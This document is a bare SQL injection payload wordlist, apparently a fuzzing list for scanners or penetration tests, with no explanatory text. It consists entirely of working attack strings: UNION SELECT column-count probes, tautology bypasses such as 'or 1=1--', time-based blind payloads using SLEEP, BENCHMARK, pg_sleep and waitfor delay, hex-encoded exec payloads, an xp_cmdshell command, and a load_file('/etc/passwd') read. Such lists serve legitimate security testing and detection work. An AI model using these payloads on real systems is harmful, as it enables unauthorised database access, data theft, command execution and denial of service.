UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2--
UNION ALL SELECT 'INJ'||'ECT'||'XXX'--
UNION ALL SELECT 1
UNION ALL SELECT 1#
UNION ALL SELECT 1,2
UNION ALL SELECT 1,2#
UNION ALL SELECT 1,2,3
UNION ALL SELECT 1,2,3#
UNION ALL SELECT 1,2,3,4
UNION ALL SELECT 1,2,3,4#
UNION ALL SELECT 1,2,3,4,5
UNION ALL SELECT 1,2,3,4,5#
UNION ALL SELECT 1,2,3,4,5,6
UNION ALL SELECT 1,2,3,4,5,6#
UNION ALL SELECT 1,2,3,4,5,6,7
UNION ALL SELECT 1,2,3,4,5,6,7#
UNION ALL SELECT 1,2,3,4,5,6,7,8
UNION ALL SELECT 1,2,3,4,5,6,7,8#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9
UNION ALL SELECT 1,2,3,4,5,6,7,8,9#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9--
UNION ALL SELECT 1,2,3,4,5,6,7,8--
UNION ALL SELECT 1,2,3,4,5,6,7--
UNION ALL SELECT 1,2,3,4,5,6--
UNION ALL SELECT 1,2,3,4,5--
UNION ALL SELECT 1,2,3,4--
UNION ALL SELECT 1,2,3--
UNION ALL SELECT 1,2--
UNION ALL SELECT 1--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A'))--
UNION ALL SELECT @@VERSION,USER(),SLEEP(5)--
UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(99)+CHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113),NULL--
UNION ALL SELECT NULL
UNION ALL SELECT NULL#
UNION ALL SELECT NULL--
UNION ALL SELECT SLEEP(5)--
UNION ALL SELECT USER(),SLEEP(5)--
UNION ALL SELECT USER()--
UNION SELECT
UNION SELECT @@VERSION,SLEEP(5),"'3
UNION SELECT @@VERSION,SLEEP(5),"'3'"#
UNION SELECT @@VERSION,SLEEP(5),3
UNION SELECT @@VERSION,SLEEP(5),USER(),4
UNION SELECT @@VERSION,SLEEP(5),USER(),4#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
WHERE 1=1 AND 1=0
WHERE 1=1 AND 1=0#
WHERE 1=1 AND 1=0--
WHERE 1=1 AND 1=1
WHERE 1=1 AND 1=1#
WHERE 1=1 AND 1=1--
\
\\
\x27UNION SELECT
`
` Backtick
``
a" or 1=1--
a"""" or 3=3--"""
a'
a' or 'a' = 'a
a' or 1=1--
a' or 3=3--
a' waitfor delay '0:0:10'--
admin' or '
and (select substring(@@version,1,1))='M'
and (select substring(@@version,1,1))='X'
and (select substring(@@version,2,1))='i'
and (select substring(@@version,2,1))='y'
and (select substring(@@version,3,1))='S'
and (select substring(@@version,3,1))='X'
and (select substring(@@version,3,1))='c'
and 0=benchmark(3000000,MD5(1))%20%23
and 0=benchmark(3000000,MD5(1))%20--
and 0=benchmark(3000000,MD5(1))%20/*
and 1 in (select var from temp)--
and 1=( if((load_file(char(110,46,101,120,11 ...
anything' OR 'x'='x
as
asc
benchmark(10000000,MD5(1))#
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))#
benchmark(50000000,MD5(1))--
bfilename
char%4039%41%2b%40SELECT
declare @q nvarchar (200) 0x730065006c00650063 ...
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @q nvarchar (200) select @q = 0x770061 ...
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
declare @q nvarchar (4000) select @q =
declare @s varchar (200) select @s = 0x73656c6 ...
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
declare @s varchar (8000) select @s = 0x73656c ...
declare @s varchar(200) select @s = 0x77616974 ...
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
declare @s varchar(22) select @s =
delete
desc
distinct
exec sp
exec xp
exec(@s)
group by userid having 1=1--
handler
having
having 1=1--
hi or 1=1 --"
hi or a=a
hi"""") or (""""a""""=""""a"""
hi' or 'a'='a
hi' or 'x'='x';
hi' or 1=1 --
hi') or ('a'='a
insert
like
limit
or
or ""a""=""a"
or ''='
or '1'='1
or '1'='1'--
or '7659'='7659
or 'a'='a
or 'something' = 'some'+'thing'
or 'text' = n'text'
or 'text' > 't'
or 'unusual' = 'unusual'
or 'whatever' in ('whatever')
or (EXISTS)
or 0=0 #
or 0=0 #"
or 0=0 --
or 1 --'
or 1 in (select @@version)--
or 1/*
or 1=1
or 1=1 /*
or 1=1 or ""=
or 1=1 or ''='
or 1=1--
or 1=1--"
or 2 > 1
or 2 between 1 and 3
or 3=3
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)--
or SLEEP(5)="
or SLEEP(5)='
or a = a
or a=a
or a=a--
or benchmark(10000000,MD5(1))#
or benchmark(50000000,MD5(1))
or benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))--
or isNULL(1/0) /*
or pg_SLEEP(5)
or pg_SLEEP(5)#
or pg_SLEEP(5)--
or pg_sleep(__TIME__)--
or pg_sleep(__TIME__)--"
or sleep(__TIME__)#
or sleep(__TIME__)='
or username like char(37);
or%201=1
or%201=1 --
order by
password:*/=1--
pg_SLEEP(5)
pg_SLEEP(5)#
pg_SLEEP(5)--
pg_sleep(5)--
pg_sleep(__TIME__)--
procedure
replace
select
select * from information_schema.tables--
select name from syscolumns where id = (sele ...
sleep(5)#
sleep(__TIME__)#
sqlvuln
sqlvuln;
t'exec master..xp_cmdshell 'nslookup www.googl ...
t'exec master..xp_cmdshell 'nslookup www.google.com'--
to_timestamp_tz
truncate
tz_offset
uni/**/on sel/**/ect
union all select @@version--
union select
union select * from users where login = char ...
union select 1,load_file('/etc/passwd'),1,1,1;
update
waitfor delay '00:00:05'
waitfor delay '00:00:05'#
waitfor delay '00:00:05'--
waitfor delay '0:0:20' --
waitfor delay '0:0:20' /*
